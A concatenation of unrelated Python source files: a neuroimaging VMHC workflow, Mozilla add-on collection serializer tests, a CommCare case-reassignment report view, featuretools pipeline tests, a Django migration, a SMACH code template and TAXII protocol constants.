- Fisher Z Transform the correlation. For details see `3dcalc <http://afni.nimh.nih.gov/pub/dist/doc/program_help/3dcalc.html>`_::
3dcalc
-a VMHC_FWHM.nii.gz
-expr 'log((a+1)/(1-a))/2'
-prefix VMHC_FWHM_Z.nii.gz
- Calculate the number of volumes(nvols) in flipped rest_res_2symmstandard.nii.gz(tmp_LRflipped.nii.gz) ::
-Use Nibabel to do this
- Compute the Z statistic map ::
3dcalc
-a VMHC_FWHM_Z.nii.gz
-expr 'a*sqrt('${nvols}'-3)'
-prefix VMHC_FWHM_Z_stat.nii.gz
Workflow:
.. image:: ../images/vmhc_graph.dot.png
:width: 500
Workflow Detailed:
.. image:: ../images/vmhc_detailed_graph.dot.png
:width: 500
References
----------
.. [1] Zuo, X.-N., Kelly, C., Di Martino, A., Mennes, M., Margulies, D. S., Bangaru, S., Grzadzinski, R., et al. (2010). Growing together and growing apart: regional and sex differences in the lifespan developmental trajectories of functional homotopy. The Journal of neuroscience : the official journal of the Society for Neuroscience, 30(45), 15034-43. doi:10.1523/JNEUROSCI.2612-10.2010
Examples
--------
>>> vmhc_w = create_vmhc()
>>> vmhc_w.inputs.inputspec.brain_symmetric = 'MNI152_T1_2mm_brain_symmetric.nii.gz'
>>> vmhc_w.inputs.inputspec.symm_standard = 'MNI152_T1_2mm_symmetric.nii.gz'
>>> vmhc_w.inputs.inputspec.twomm_brain_mask_dil = 'MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz'
>>> vmhc_w.inputs.inputspec.config_file_twomm = 'T1_2_MNI152_2mm_symmetric.cnf'
>>> vmhc_w.inputs.inputspec.standard = 'MNI152_T1_2mm.nii.gz'
>>> vmhc_w.inputs.fwhm_input.fwhm = [4.5, 6]
>>> vmhc_w.get_node('fwhm_input').iterables = ('fwhm', [4.5, 6])
>>> vmhc_w.inputs.inputspec.rest_res = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_res_filt.nii.gz')
>>> vmhc_w.inputs.inputspec.reorient = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_RPI.nii.gz')
>>> vmhc_w.inputs.inputspec.brain = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/anat/mprage_brain.nii.gz')
>>> vmhc_w.inputs.inputspec.example_func2highres_mat = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/reg/example_func2highres.mat')
>>> vmhc_w.inputs.inputspec.rest_mask = os.path.abspath('/home/data/Projects/Pipelines_testing/Dickstein/subjects/s1001/func/original/rest_mask.nii.gz')
>>> vmhc_w.run() # doctest: +SKIP
"""
vmhc = pe.Workflow(name='vmhc_workflow')
inputNode = pe.Node(util.IdentityInterface(fields=['brain',
'brain_symmetric',
'rest_res',
'reorient',
'example_func2highres_mat',
'symm_standard',
'twomm_brain_mask_dil',
'config_file_twomm',
'rest_mask',
'standard',
'mean_functional']),
name='inputspec')
outputNode = pe.Node(util.IdentityInterface(fields=['highres2symmstandard',
'highres2symmstandard_mat',
'highres2symmstandard_warp',
'fnirt_highres2symmstandard',
'highres2symmstandard_jac',
'rest_res_2symmstandard',
'VMHC_FWHM_img',
'VMHC_Z_FWHM_img',
'VMHC_Z_stat_FWHM_img'
]),
name='outputspec')
inputnode_fwhm = pe.Node(util.IdentityInterface(fields=['fwhm']),
name='fwhm_input')
if use_ants == False:
## Linear registration of T1 --> symmetric standard
linear_T1_to_symmetric_standard = pe.Node(interface=fsl.FLIRT(),
name='linear_T1_to_symmetric_standard')
linear_T1_to_symmetric_standard.inputs.cost = 'corratio'
linear_T1_to_symmetric_standard.inputs.cost_func = 'corratio'
linear_T1_to_symmetric_standard.inputs.dof = 12
linear_T1_to_symmetric_standard.inputs.interp = 'trilinear'
## Perform nonlinear registration
##(higres to standard) to symmetric standard brain
nonlinear_highres_to_symmetric_standard = pe.Node(interface=fsl.FNIRT(),
name='nonlinear_highres_to_symmetric_standard')
nonlinear_highres_to_symmetric_standard.inputs.fieldcoeff_file = True
nonlinear_highres_to_symmetric_standard.inputs.jacobian_file = True
nonlinear_highres_to_symmetric_standard.inputs.warp_resolution = (10, 10, 10)
# needs new inputs. needs input from resources for the field coeff of the template->symmetric.
# and needs the field coeff of the anatomical-to-template registration
## Apply nonlinear registration (func to standard)
nonlinear_func_to_standard = pe.Node(interface=fsl.ApplyWarp(),
name='nonlinear_func_to_standard')
elif use_ants == True:
# ANTS warp image etc.
calculate_ants_xfm_vmhc = create_wf_calculate_ants_warp(name='calculate_ants_xfm_vmhc')
fsl_to_itk_vmhc = create_wf_c3d_fsl_to_itk(0, name='fsl_to_itk_vmhc')
collect_transforms_vmhc = create_wf_collect_transforms(0, name='collect_transforms_vmhc')
apply_ants_xfm_vmhc = create_wf_apply_ants_warp(0,name='apply_ants_xfm_vmhc')
calculate_ants_xfm_vmhc.inputs.inputspec.dimension = 3
calculate_ants_xfm_vmhc.inputs.inputspec. \
use_histogram_matching = True
calculate_ants_xfm_vmhc.inputs.inputspec. \
winsorize_lower_quantile = 0.01
calculate_ants_xfm_vmhc.inputs.inputspec. \
winsorize_upper_quantile = 0.99
calculate_ants_xfm_vmhc.inputs.inputspec. \
metric = ['MI','MI','CC']
calculate_ants_xfm_vmhc.inputs.inputspec.metric_weight = [1,1,1]
calculate_ants_xfm_vmhc.inputs.inputspec. \
radius_or_number_of_bins = [32,32,4]
calculate_ants_xfm_vmhc.inputs.inputspec. \
sampling_strategy = ['Regular','Regular',None]
calculate_ants_xfm_vmhc.inputs.inputspec. \
sampling_percentage = [0.25,0.25,None]
calculate_ants_xfm_vmhc.inputs.inputspec. \
number_of_iterations = [[1000,500,250,100], \
[1000,500,250,100], [100,100,70,20]]
calculate_ants_xfm_vmhc.inputs.inputspec. \
convergence_threshold = [1e-8,1e-8,1e-9]
calculate_ants_xfm_vmhc.inputs.inputspec. \
convergence_window_size = [10,10,15]
calculate_ants_xfm_vmhc.inputs.inputspec. \
transforms = ['Rigid','Affine','SyN']
calculate_ants_xfm_vmhc.inputs.inputspec. \
transform_parameters = [[0.1],[0.1],[0.1,3,0]]
calculate_ants_xfm_vmhc.inputs.inputspec. \
shrink_factors = [[8,4,2,1],[8,4,2,1],[6,4,2,1]]
calculate_ants_xfm_vmhc.inputs.inputspec. \
smoothing_sigmas = [[3,2,1,0],[3,2,1,0],[3,2,1,0]]
apply_ants_xfm_vmhc.inputs.inputspec.interpolation = 'Gaussian'
apply_ants_xfm_vmhc.inputs.inputspec.input_image_type = 3
## copy and L/R swap file
copy_and_L_R_swap = pe.Node(interface=fsl.SwapDimensions(),
name='copy_and_L_R_swap')
copy_and_L_R_swap.inputs.new_dims = ('-x', 'y', 'z')
## caculate vmhc
pearson_correlation = pe.Node(interface=preprocess.TCorrelate(),
name='pearson_correlation')
pearson_correlation.inputs.pearson = True
pearson_correlation.inputs.polort = -1
pearson_correlation.inputs.outputtype = 'NIFTI_GZ'
z_trans = pe.Node(interface=preprocess.Calc(),
name='z_trans')
z_trans.inputs.expr = 'log((1+a)/(1-a))/2'
z_trans.inputs.outputtype = 'NIFTI_GZ'
z_stat = pe.Node(interface=preprocess.Calc(),
name='z_stat')
z_stat.inputs.outputtype = 'NIFTI_GZ'
NVOLS = pe.Node(util.Function(input_names=['in_files'],
output_names=['nvols'],
function=get_img_nvols),
name='NVOLS')
generateEXP = pe.Node(util.Function(input_names=['nvols'],
output_names=['expr'],
function=get_operand_expression),
name='generateEXP')
smooth = pe.Node(interface=fsl.MultiImageMaths(),
name='smooth')
if use_ants == False:
vmhc.connect(inputNode, 'brain',
linear_T1_to_symmetric_standard, 'in_file')
vmhc.connect(inputNode, 'brain_symmetric',
linear_T1_to_symmetric_standard, 'reference')
vmhc.connect(inputNode, 'reorient',
nonlinear_highres_to_symmetric_standard, 'in_file')
vmhc.connect(linear_T1_to_symmetric_standard, 'out_matrix_file',
nonlinear_highres_to_symmetric_standard, 'affine_file')
vmhc.connect(inputNode, 'symm_standard',
nonlinear_highres_to_symmetric_standard, 'ref_file')
vmhc.connect(inputNode, 'twomm_brain_mask_dil',
nonlinear_highres_to_symmetric_standard, 'refmask_file')
vmhc.connect(inputNode, 'config_file_twomm',
nonlinear_highres_to_symmetric_standard, 'config_file')
vmhc.connect(inputNode, 'rest_res',
smooth, 'in_file')
vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),
smooth, 'op_string')
vmhc.connect(inputNode, 'rest_mask',
smooth, 'operand_files')
vmhc.connect(smooth, 'out_file',
nonlinear_func_to_standard, 'in_file')
vmhc.connect(inputNode, 'standard',
nonlinear_func_to_standard, 'ref_file')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'fieldcoeff_file',
nonlinear_func_to_standard, 'field_file')
## func->anat matrix (bbreg)
vmhc.connect(inputNode, 'example_func2highres_mat',
nonlinear_func_to_standard, 'premat')
vmhc.connect(nonlinear_func_to_standard, 'out_file',
copy_and_L_R_swap, 'in_file')
vmhc.connect(nonlinear_func_to_standard, 'out_file',
pearson_correlation, 'xset')
elif use_ants == True:
# connections for ANTS stuff
# registration calculation stuff -- might go out the window
vmhc.connect(inputNode, 'brain',
calculate_ants_xfm_vmhc, 'inputspec.anatomical_brain')
vmhc.connect(inputNode, 'brain_symmetric',
calculate_ants_xfm_vmhc, 'inputspec.reference_brain')
# functional apply warp stuff
vmhc.connect(inputNode, 'rest_res',
smooth, 'in_file')
vmhc.connect(inputnode_fwhm, ('fwhm', set_gauss),
smooth, 'op_string')
vmhc.connect(inputNode, 'rest_mask',
smooth, 'operand_files')
vmhc.connect(smooth, 'out_file',
apply_ants_xfm_vmhc, 'inputspec.input_image')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.ants_rigid_xfm',
collect_transforms_vmhc, 'inputspec.linear_rigid')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.ants_affine_xfm',
collect_transforms_vmhc, 'inputspec.linear_affine')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.warp_field',
collect_transforms_vmhc, 'inputspec.warp_file')
## func->anat matrix (bbreg)
vmhc.connect(inputNode, 'example_func2highres_mat',
fsl_to_itk_vmhc, 'inputspec.affine_file')
vmhc.connect(inputNode, 'brain', fsl_to_itk_vmhc,
'inputspec.reference_file')
vmhc.connect(inputNode, 'mean_functional', fsl_to_itk_vmhc,
'inputspec.source_file')
vmhc.connect(fsl_to_itk_vmhc, 'outputspec.itk_transform',
collect_transforms_vmhc, 'inputspec.fsl_to_itk_affine')
'''
vmhc.connect(inputNode, 'brain',
apply_ants_xfm_vmhc, 'inputspec.conversion_reference')
vmhc.connect(inputNode, 'mean_functional',
apply_ants_xfm_vmhc, 'inputspec.conversion_source')
'''
vmhc.connect(inputNode, 'brain_symmetric',
apply_ants_xfm_vmhc, 'inputspec.reference_image')
vmhc.connect(collect_transforms_vmhc, \
'outputspec.transformation_series', \
apply_ants_xfm_vmhc, 'inputspec.transforms')
vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',
copy_and_L_R_swap, 'in_file')
vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',
pearson_correlation, 'xset')
vmhc.connect(copy_and_L_R_swap, 'out_file',
pearson_correlation, 'yset')
vmhc.connect(pearson_correlation, 'out_file',
z_trans, 'in_file_a')
vmhc.connect(copy_and_L_R_swap, 'out_file',
NVOLS, 'in_files')
vmhc.connect(NVOLS, 'nvols',
generateEXP, 'nvols')
vmhc.connect(z_trans, 'out_file',
z_stat, 'in_file_a')
vmhc.connect(generateEXP, 'expr',
z_stat, 'expr')
if use_ants == False:
vmhc.connect(linear_T1_to_symmetric_standard, 'out_file',
outputNode, 'highres2symmstandard')
vmhc.connect(linear_T1_to_symmetric_standard, 'out_matrix_file',
outputNode, 'highres2symmstandard_mat')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'jacobian_file',
outputNode, 'highres2symmstandard_jac')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'fieldcoeff_file',
outputNode, 'highres2symmstandard_warp')
vmhc.connect(nonlinear_highres_to_symmetric_standard, 'warped_file',
outputNode, 'fnirt_highres2symmstandard')
vmhc.connect(nonlinear_func_to_standard, 'out_file',
outputNode, 'rest_res_2symmstandard')
elif use_ants == True:
# ANTS warp outputs to outputnode
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.ants_affine_xfm',
outputNode, 'highres2symmstandard_mat')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.warp_field',
outputNode, 'highres2symmstandard_warp')
vmhc.connect(calculate_ants_xfm_vmhc, 'outputspec.normalized_output_brain',
outputNode, 'fnirt_highres2symmstandard')
vmhc.connect(apply_ants_xfm_vmhc, 'outputspec.output_image',
outputNode, 'rest_res_2symmstandard')
vmhc.connect(pearson_correlation, 'out_file',
outputNode, 'VMHC_FWHM_img')
vmhc.connect(z_trans, 'out_file',
outputNode, 'VMHC_Z_FWHM_img')
vmhc.connect(z_stat, 'out_file',
outputNode, 'VMHC_Z_stat_FWHM_img')
return vmhc
|
import mock
from rest_framework import serializers
from waffle.testutils import override_switch
from olympia.amo.tests import (
BaseTestCase, addon_factory, collection_factory, TestCase, user_factory)
from olympia.bandwagon.models import CollectionAddon
from olympia.bandwagon.serializers import (
CollectionAddonSerializer, CollectionAkismetSpamValidator,
CollectionSerializer, CollectionWithAddonsSerializer)
from olympia.lib.akismet.models import AkismetReport
class TestCollectionAkismetSpamValidator(TestCase):
def setUp(self):
self.validator = CollectionAkismetSpamValidator(
('name', 'description'))
serializer = mock.Mock()
serializer.instance = collection_factory(
name='name', description='Big Cheese')
request = mock.Mock()
request.user = user_factory()
request.META = {}
serializer.context = {'request': request}
self.validator.set_context(serializer)
self.data = {
'name': {'en-US': 'Collection', 'fr': u'Collection'},
'description': {'en-US': 'Big Cheese', 'fr': u'une gránd fromagé'},
'random_data': {'en-US': 'to ignore'},
'slug': 'cheese'}
@override_switch('akismet-spam-check', active=False)
@mock.patch('olympia.lib.akismet.models.AkismetReport.comment_check')
def test_waffle_off(self, comment_check_mock):
self.validator(self.data)
# No Akismet checks
assert AkismetReport.objects.count() == 0
comment_check_mock.assert_not_called()
@override_switch('akismet-spam-check', active=True)
@mock.patch('olympia.lib.akismet.models.AkismetReport.comment_check')
def test_ham(self, comment_check_mock):
comment_check_mock.return_value = AkismetReport.HAM
self.validator(self.data)
# Akismet check is there
assert AkismetReport.objects.count() == 2
name_report = AkismetReport.objects.first()
# name will only be there once because it's duplicated.
assert name_report.comment_type == 'collection-name'
assert name_report.comment == self.data['name']['en-US']
summary_report = AkismetReport.objects.last()
# en-US description won't be there because it's an existing description
assert summary_report.comment_type == 'collection-description'
assert summary_report.comment == self.data['description']['fr']
assert comment_check_mock.call_count == 2
@override_switch('akismet-spam-check', active=True)
@mock.patch('olympia.lib.akismet.models.AkismetReport.comment_check')
def test_spam(self, comment_check_mock):
comment_check_mock.return_value = AkismetReport.MAYBE_SPAM
with self.assertRaises(serializers.ValidationError):
self.validator(self.data)
# Akismet check is there
assert AkismetReport.objects.count() == 2
name_report = AkismetReport.objects.first()
# name will only be there once because it's duplicated.
assert name_report.comment_type == 'collection-name'
assert name_report.comment == self.data['name']['en-US']
summary_report = AkismetReport.objects.last()
# en-US description won't be there because it's an existing description
assert summary_report.comment_type == 'collection-description'
assert summary_report.comment == self.data['description']['fr']
# After the first comment_check was spam, additinal ones are skipped.
assert comment_check_mock.call_count == 1
class TestCollectionSerializer(BaseTestCase):
serializer = CollectionSerializer
def setUp(self):
super(TestCollectionSerializer, self).setUp()
self.user = user_factory()
self.collection = collection_factory()
self.collection.update(author=self.user)
def serialize(self):
return self.serializer(self.collection).data
def test_basic(self):
data = self.serialize()
assert data['id'] == self.collection.id
assert data['uuid'] == self.collection.uuid
assert data['name'] == {'en-US': self.collection.name}
assert data['description'] == {'en-US': self.collection.description}
assert data['url'] == self.collection.get_abs_url()
assert data['addon_count'] == self.collection.addon_count
assert data['modified'] == (
self.collection.modified.replace(microsecond=0).isoformat() + 'Z')
assert data['author']['id'] == self.user.id
assert data['slug'] == self.collection.slug
assert data['public'] == self.collection.listed
assert data['default_locale'] == self.collection.default_locale
class TestCollectionAddonSerializer(BaseTestCase):
def setUp(self):
self.collection = collection_factory()
self.addon = addon_factory()
self.collection.add_addon(self.addon)
self.item = CollectionAddon.objects.get(addon=self.addon,
collection=self.collection)
self.item.comments = u'Dis is nice'
self.item.save()
def serialize(self):
return CollectionAddonSerializer(self.item).data
def test_basic(self):
data = self.serialize()
assert data['addon']['id'] == self.collection.addons.all()[0].id
assert data['notes'] == {'en-US': self.item.comments}
class TestCollectionWithAddonsSerializer(TestCollectionSerializer):
serializer = CollectionWithAddonsSerializer
def setUp(self):
super(TestCollectionWithAddonsSerializer, self).setUp()
self.addon = addon_factory()
self.collection.add_addon(self.addon)
def serialize(self):
mock_viewset = mock.MagicMock()
collection_addons = CollectionAddon.objects.filter(
addon=self.addon, collection=self.collection)
mock_viewset.get_addons_queryset.return_value = collection_addons
return self.serializer(
self.collection, context={'view': mock_viewset}).data
def test_basic(self):
super(TestCollectionWithAddonsSerializer, self).test_basic()
collection_addon = CollectionAddon.objects.get(
addon=self.addon, collection=self.collection)
data = self.serialize()
assert data['addons'] == [
CollectionAddonSerializer(collection_addon).data
]
assert data['addons'][0]['addon']['id'] == self.addon.id
|
from django.utils.safestring import mark_safe
from corehq.apps.data_interfaces.dispatcher import EditDataInterfaceDispatcher
from corehq.apps.groups.models import Group
from django.core.urlresolvers import reverse
from corehq.apps.reports import util
from corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn, DTSortType
from corehq.apps.reports.generic import GenericReportView
from corehq.apps.reports.models import HQUserType
from corehq.apps.reports.standard.cases.basic import CaseListMixin
from corehq.apps.reports.standard.cases.data_sources import CaseDisplay
from dimagi.utils.decorators.memoized import memoized
from django.utils.translation import ugettext_noop
from django.utils.translation import ugettext as _
class DataInterface(GenericReportView):
# overriding properties from GenericReportView
section_name = ugettext_noop("Data")
base_template = "reports/standard/base_template.html"
asynchronous = True
dispatcher = EditDataInterfaceDispatcher
exportable = False
@property
def default_report_url(self):
return reverse('data_interfaces_default', args=[self.request.project])
class CaseReassignmentInterface(CaseListMixin, DataInterface):
name = ugettext_noop("Reassign Cases")
slug = "reassign_cases"
report_template_path = 'data_interfaces/interfaces/case_management.html'
asynchronous = False
ajax_pagination = True
@property
@memoized
def all_case_sharing_groups(self):
return Group.get_case_sharing_groups(self.domain)
@property
def headers(self):
headers = DataTablesHeader(
DataTablesColumn(mark_safe('Select <a href="#" class="select-all btn btn-mini btn-inverse">all</a> <a href="#" class="select-none btn btn-mini btn-warning">none</a>'), sortable=False, span=2),
DataTablesColumn(_("Case Name"), span=3, prop_name="name.exact"),
DataTablesColumn(_("Case Type"), span=2, prop_name="type.exact"),
DataTablesColumn(_("Owner"), span=2, prop_name="owner_display", sortable=False),
DataTablesColumn(_("Last Modified"), span=3, prop_name="modified_on"),
)
return headers
@property
def rows(self):
checkbox = mark_safe('<input type="checkbox" class="selected-commcare-case" data-bind="event: {change: updateCaseSelection}" data-caseid="%(case_id)s" data-owner="%(owner)s" data-ownertype="%(owner_type)s" />')
for row in self.es_results['hits'].get('hits', []):
case = self.get_case(row)
display = CaseDisplay(self, case)
yield [
checkbox % dict(case_id=case['_id'], owner=display.owner_id, owner_type=display.owner_type),
display.case_link,
display.case_type,
display.owner_display,
util.format_relative_date(display.parse_date(display.case['modified_on']))['html'],
]
@property
def report_context(self):
context = super(CaseReassignmentInterface, self).report_context
active_users = self.get_all_users_by_domain(user_filter=tuple(HQUserType.use_defaults()), simplified=True)
context.update(
users=[dict(ownerid=user.get('user_id'), name=user.get('username_in_report'), type="user")
for user in active_users],
groups=[dict(ownerid=group.get_id, name=group.name, type="group")
for group in self.all_case_sharing_groups],
user_ids=self.user_ids,
)
return context
|
import numpy as np
import pandas as pd
import pytest
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.impute import SimpleImputer
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer, StandardScaler
from featuretools.demo.mock_customer import load_mock_customer
from featuretools.wrappers import DFSTransformer
def select_numeric(df):
return df.select_dtypes(exclude=['object'])
@pytest.fixture(scope='module')
def es():
es = load_mock_customer(n_customers=15,
n_products=15,
n_sessions=75,
n_transactions=1000,
random_seed=0,
return_entityset=True)
return es
@pytest.fixture(scope='module')
def df(es):
df = es['customers'].df
df['target'] = np.random.randint(1, 3, df.shape[0]) # 1 or 2 values
return df
@pytest.fixture(scope='module')
def pipeline(es):
pipeline = Pipeline(steps=[
('ft', DFSTransformer(entityset=es,
target_entity="customers",
max_features=20)),
("numeric", FunctionTransformer(select_numeric, validate=False)),
('imp', SimpleImputer()),
('et', ExtraTreesClassifier(n_estimators=10))
])
return pipeline
def test_sklearn_transformer(es, df):
# Using with transformers
pipeline = Pipeline(steps=[
('ft', DFSTransformer(entityset=es,
target_entity="customers")),
("numeric", FunctionTransformer(select_numeric, validate=False)),
('sc', StandardScaler()),
])
X_train = pipeline.fit(df['customer_id']).transform(df['customer_id'])
assert X_train.shape[0] == 15
def test_sklearn_estimator(df, pipeline):
# Using with estimator
pipeline.fit(df['customer_id'].values, y=df.target.values) \
.predict(df['customer_id'].values)
result = pipeline.score(df['customer_id'].values, df.target.values)
assert isinstance(result, (float))
# Pickling / Unpickling Pipeline
# TODO fix this
# s = pickle.dumps(pipeline)
# pipe_pickled = pickle.loads(s)
# result = pipe_pickled.score(df['customer_id'].values, df.target.values)
# assert isinstance(result, (float))
def test_sklearn_cross_val_score(df, pipeline):
# Using with cross_val_score
results = cross_val_score(pipeline,
X=df['customer_id'].values,
y=df.target.values,
cv=2,
scoring="accuracy")
assert isinstance(results[0], (float))
assert isinstance(results[1], (float))
def test_sklearn_gridsearchcv(df, pipeline):
# Using with GridSearchCV
params = {
'et__max_depth': [5, 10]
}
grid = GridSearchCV(estimator=pipeline,
param_grid=params,
cv=3)
grid.fit(df['customer_id'].values, df.target.values)
assert len(grid.predict(df['customer_id'].values)) == 15
def test_sklearn_cuttoff(pipeline):
# Using cuttof_time to filter data
ct = pd.DataFrame()
ct['customer_id'] = [1, 2, 3]
ct['time'] = pd.to_datetime(['2014-1-1 04:00',
'2014-1-1 04:00',
'2014-1-1 04:00'])
ct['label'] = [True, True, False]
results = pipeline.fit(ct, y=ct.label).predict(ct)
assert len(results) == 3
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('controlled_vocabularies', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='property',
name='label',
field=models.TextField(help_text=b'The value for the added property.'),
),
migrations.AlterField(
model_name='property',
name='property_name',
field=models.CharField(choices=[(b'definition', b'Definition'), (b'description', b'Description'), (b'note', b'Note'), (b'system', b'System')], help_text=b"The name of the added property; e.g., 'Description'.", max_length=50, verbose_name=b'Property Type'),
),
migrations.AlterField(
model_name='term',
name='label',
field=models.CharField(help_text=b'The human-readable name of the term.', max_length=255),
),
migrations.AlterField(
model_name='term',
name='name',
field=models.CharField(help_text=b'The name or key that uniquely identifies the term within the vocabulary.', max_length=50),
),
migrations.AlterField(
model_name='term',
name='order',
field=models.IntegerField(blank=True, help_text=b'The preferred order for viewing the term in the vocabulary.', null=True),
),
migrations.AlterField(
model_name='term',
name='vocab_list',
field=models.ForeignKey(help_text=b'The vocabulary that the term needs to be added to.', on_delete=django.db.models.deletion.CASCADE, to='controlled_vocabularies.Vocabulary', verbose_name=b'Vocabulary'),
),
migrations.AlterField(
model_name='vocabulary',
name='definition',
field=models.TextField(blank=True, help_text=b'A brief statement of the meaning of the vocabulary.'),
),
migrations.AlterField(
model_name='vocabulary',
name='label',
field=models.CharField(help_text=b'The human-readable name of the vocabulary.', max_length=255),
),
migrations.AlterField(
model_name='vocabulary',
name='maintainer',
field=models.CharField(help_text=b'The person responsible for creating and updating the vocabulary.', max_length=50),
),
migrations.AlterField(
model_name='vocabulary',
name='maintainerEmail',
field=models.CharField(help_text=b'E-mail address of maintainer.', max_length=50, verbose_name=b'Maintainer E-mail'),
),
migrations.AlterField(
model_name='vocabulary',
name='name',
field=models.CharField(help_text=b'The name or key that uniquely identifies the vocabulary.', max_length=50, unique=True),
),
migrations.AlterField(
model_name='vocabulary',
name='order',
field=models.CharField(choices=[(b'name', b'name'), (b'label', b'label'), (b'order', b'order')], help_text=b'The preferred order for viewing the UNTL list of controlled vocabularies.', max_length=10),
),
]
|
{% block meta %}
name: Base
description: SMACH base template.
language: Python
framework: SMACH
type: Base
tags: [core]
includes: []
extends: []
variables:
- - manifest:
description: ROS manifest name.
type: str
- - node_name:
description: ROS node name for the state machine.
type: str
- outcomes:
description: A list of possible outcomes of the state machine.
type: list
- - userdata:
description: Definitions for userdata needed by child states.
type: dict
- - function_name:
description: A name for the main executable state machine function.
type: str
input_keys: []
output_keys: []
{% endblock meta %}
{% from "Utils.tpl.py" import import_module, render_outcomes, render_userdata %}
{% set defined_headers = [] %}
{% set local_vars = [] %}
{% block base_header %}
{{ base_header }}
{% endblock base_header %}
{% block imports %}
{{ import_module(defined_headers, 'smach') }}
{{ imports }}
{% endblock imports %}
{% block defs %}
{{ defs }}
{% endblock defs %}
{% block class_defs %}
{{ class_defs }}
{% endblock class_defs %}
{% block cb_defs %}
{{ cb_defs }}
{% endblock cb_defs %}
{% if name is defined %}{% set sm_name = name | lower() %}{% else %}{% set sm_name = 'sm' %}{% endif %}
{% block main_def %}
def {% if function_name is defined %}{{ function_name | lower() }}{% else %}main{% endif %}():
{{ main_def | indent(4) }}
{% endblock main_def %}
{% block body %}
{{ sm_name }} = smach.StateMachine({{ render_outcomes(outcomes) }})
{# Container header insertion variable indexed by container state name #}
{% if name in header %}{{ header[name] | indent(4, true) }}{% endif %}
{# Render container userdata #}
{% if userdata is defined %}{{ render_userdata(name | lower(), userdata) | indent(4) }}{% endif %}
{# Render state userdata #}
{% if name in header_userdata %}{{ header_userdata[name] | indent(4, true) }}{% endif %}
with {{ sm_name }}:
{# Container body insertion variable #}
{{ body | indent(8) }}
{% endblock body %}
{% block footer %}
{{ footer | indent(8) }}
{% endblock footer %}
{% block execute %}
{{ execute | indent(4) }}
outcome = {{ sm_name }}.execute()
{% endblock execute %}
{% block base_footer %}
{{ base_footer | indent(4) }}
{% endblock base_footer %}
{% block main %}
if __name__ == '__main__':
{{ '' | indent(4, true) }}{% if function_name is defined %}{{ function_name | lower() }}{% else %}main{% endif %}()
{% endblock main %}
|
NS_MAP = {
'taxii': 'http://taxii.mitre.org/messages/taxii_xml_binding-1',
'taxii_11': 'http://taxii.mitre.org/messages/taxii_xml_binding-1.1',
'tdq': 'http://taxii.mitre.org/query/taxii_default_query-1',
}
ns_map = NS_MAP
MSG_STATUS_MESSAGE = 'Status_Message'
MSG_DISCOVERY_REQUEST = 'Discovery_Request'
MSG_DISCOVERY_RESPONSE = 'Discovery_Response'
MSG_FEED_INFORMATION_REQUEST = 'Feed_Information_Request'
MSG_FEED_INFORMATION_RESPONSE = 'Feed_Information_Response'
MSG_MANAGE_FEED_SUBSCRIPTION_REQUEST = 'Subscription_Management_Request'
MSG_MANAGE_FEED_SUBSCRIPTION_RESPONSE = 'Subscription_Management_Response'
MSG_POLL_REQUEST = 'Poll_Request'
MSG_POLL_RESPONSE = 'Poll_Response'
MSG_INBOX_MESSAGE = 'Inbox_Message'
MSG_TYPES_10 = (MSG_STATUS_MESSAGE, MSG_DISCOVERY_REQUEST, MSG_DISCOVERY_RESPONSE,
MSG_FEED_INFORMATION_REQUEST, MSG_FEED_INFORMATION_RESPONSE,
MSG_MANAGE_FEED_SUBSCRIPTION_REQUEST,
MSG_MANAGE_FEED_SUBSCRIPTION_RESPONSE, MSG_POLL_REQUEST,
MSG_POLL_RESPONSE, MSG_INBOX_MESSAGE)
MSG_POLL_FULFILLMENT_REQUEST = 'Poll_Fulfillment'
MSG_COLLECTION_INFORMATION_REQUEST = 'Collection_Information_Request'
MSG_COLLECTION_INFORMATION_RESPONSE = 'Collection_Information_Response'
MSG_MANAGE_COLLECTION_SUBSCRIPTION_REQUEST = 'Subscription_Management_Request'
MSG_MANAGE_COLLECTION_SUBSCRIPTION_RESPONSE = 'Subscription_Management_Response'
MSG_TYPES_11 = (MSG_STATUS_MESSAGE, MSG_DISCOVERY_REQUEST, MSG_DISCOVERY_RESPONSE,
MSG_COLLECTION_INFORMATION_REQUEST, MSG_COLLECTION_INFORMATION_RESPONSE,
MSG_MANAGE_COLLECTION_SUBSCRIPTION_REQUEST,
MSG_MANAGE_COLLECTION_SUBSCRIPTION_RESPONSE, MSG_POLL_REQUEST,
MSG_POLL_RESPONSE, MSG_INBOX_MESSAGE, MSG_POLL_FULFILLMENT_REQUEST)
ST_BAD_MESSAGE = 'BAD_MESSAGE'
ST_DENIED = 'DENIED'
ST_FAILURE = 'FAILURE'
ST_NOT_FOUND = 'NOT_FOUND'
ST_POLLING_UNSUPPORTED = 'POLLING_UNSUPPORTED'
ST_RETRY = 'RETRY'
ST_SUCCESS = 'SUCCESS'
ST_UNAUTHORIZED = 'UNAUTHORIZED'
ST_UNSUPPORTED_MESSAGE_BINDING = 'UNSUPPORTED_MESSAGE'
ST_UNSUPPORTED_CONTENT_BINDING = 'UNSUPPORTED_CONTENT'
ST_UNSUPPORTED_PROTOCOL = 'UNSUPPORTED_PROTOCOL'
ST_TYPES_10 = (ST_BAD_MESSAGE, ST_DENIED, ST_FAILURE, ST_NOT_FOUND,
ST_POLLING_UNSUPPORTED, ST_RETRY, ST_SUCCESS, ST_UNAUTHORIZED,
